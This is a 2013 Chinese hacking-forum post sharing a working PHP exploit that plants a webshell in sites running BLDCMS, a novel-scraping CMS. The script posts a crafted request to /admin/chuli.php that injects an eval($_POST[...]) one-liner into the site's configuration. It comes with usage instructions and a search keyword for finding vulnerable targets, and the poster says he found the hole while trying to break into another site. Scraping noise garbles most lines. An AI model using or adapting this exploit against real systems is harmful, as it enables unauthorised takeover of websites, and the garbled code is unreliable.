找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞/ Y/ T; c+ g, ^; _% w
' g2 V7 E7 B" b
5 L6 H+ C+ c" i; ?
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
: }4 u' g0 Q' _' e8 Q+ B3 u " V. R. T$ j# C' ~4 B
既然都有人发了 我就把我之前写好的EXP放出来吧
" u- ^/ [* V: R
. k2 r3 ]; J9 X  q* Q! Nview source print?01.php;">2 G9 ^+ m- ^2 a* ]2 j9 ]4 H" K3 @) ]
02.<!--?php: W( v/ k( O7 b! z0 Z, U" O
03.echo "-------------------------------------------------------------------
/ t% n* M4 [% e: i04.
: m8 d! @8 u  i' \05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP( l* W( W& T& d) V8 y
06. * z+ ~. h6 o  S, }) R
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun0 U5 O" f! S: W) ~6 c
08.
! Z7 |" n2 G6 }8 [/ `' P09.QQ:981009941\r\n                                2013.3.21\r\n             0 D1 Z2 d# y) h- L! c# X
10.
" X& {7 {, T# `/ |$ v! F11.
0 d% U, j, i  E$ J12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 g3 z( Z# T5 w1 {# D13.
% G3 ^) K  }! l+ _3 A  M14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
* O! `1 o2 u$ W; o% {- B, ^15. 7 D2 U% {! Z7 Z- V' Z7 r! d0 V7 t
16.--------------------------------------------------------------------\r\n";* H- }) k4 I1 g8 M+ `. q6 T; v8 J
17.$url=$argv[1];
6 [) f8 N/ {8 V; [& Z) r) R18.$dir=$argv[2];
0 [) s/ k1 U& t5 N19.$pass=$argv[3];2 F4 R4 F! V  U! A& |
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
4 D, \0 U; D  b4 r3 F/ v, Y21.if (emptyempty($pass)||emptyempty($url))
7 O5 i! a4 Z6 v5 r1 m22.{exit("请输入参数");}
3 q- D0 y2 ~5 t8 d7 t23.else
: j/ p& S  s  d  W. o24.{% @2 X) |# c6 M
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev' u  A: ~( a. n9 d1 ]" y
26. 5 H" V$ F& I0 h. s" w" [$ ?7 p# u
27.al;' O9 D3 F- U% U. n
28.$length = strlen($fuckdata);1 K  ~" {$ m  {9 A3 o' w
29.function getshell($url,$pass)
$ B2 K/ W4 d' C6 ^" q1 A30.{% G- h% p( G8 t
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
/ I4 ?# V' c$ U3 w32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";! `( N' {# m9 R0 A$ Y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";' ?7 {+ l6 S! o, S) w5 e2 K
34.$header .= "User-Agent: MSIE\r\n";. i) m- q$ k% Z0 |+ _& k- @4 t
35.$header .= "Host:".$url."\r\n";
0 w# D3 M% @& c# C36.$header .= "Content-Length: ".$length."\r\n";, |& ^2 H0 H7 l' R# @. H
37.$header .= "Connection: Close\r\n";- y' |5 j& E  B: u7 m- z1 o
38.$header .="\r\n";! n5 e- {. G* p  E
39.$header .= $fuckdata."\r\n\r\n";3 f( X$ l) C- ^7 W6 ]- ^
40.$fp = fsockopen($url, 80,$errno,$errstr,15);. z! ~- E$ j8 F* D& s* ]) P4 [( T) i
41.if (!$fp)
3 \6 T! k4 P  T# h5 d; C42.{3 a; G4 ~9 J" K& j, a
43.exit ("利用失败:请检查指定目标是否能正常打开");, \( z; y# q' }
44.}; k% s% K) A/ ~9 M. }5 k
45.else{ if (!fputs($fp,$header))! a% |8 `& l( E
46.{exit ("利用失败");}( f, x) x- R( X0 M1 T
47.else, }2 ?. p. T+ z( W2 D' H' X! b. R" U
48.{
! u9 g$ }) T4 S' N& U49.$receive = '';
& [- u0 M- L1 N" b- m50.while (!feof($fp)) {# }+ h& |' T' b' J% N& m
51.$receive .= @fgets($fp, 1000);, I- B! N( D" o
52.}' x: S! d% t% ?, U( C4 o
53.@fclose($fp);
4 Q( J+ |3 w- c54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标" L) T' A, r1 w% ]
55. : g) j& g* m4 r5 k* W/ |
56.GPC是否=off)";% j7 Y$ T& ?( |2 [: r/ t
57.}}6 ?! y% v0 S  R# k
58.}. O3 f- z: [6 F) J
59.}
9 c1 r0 B  y+ W" \- i+ N60.getshell($url,$pass);. u2 O5 U9 x% I/ A9 G
61.?-->
: W# c1 P! \" m0 t* Q 8 Q+ M' b) B% J9 R! |" u
1 F5 P5 J; l( m0 C7 t

7 w8 y& J% Q! d' @, O+ `" W; rby 数据流! a. {% k3 \" h, c- D; u9 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表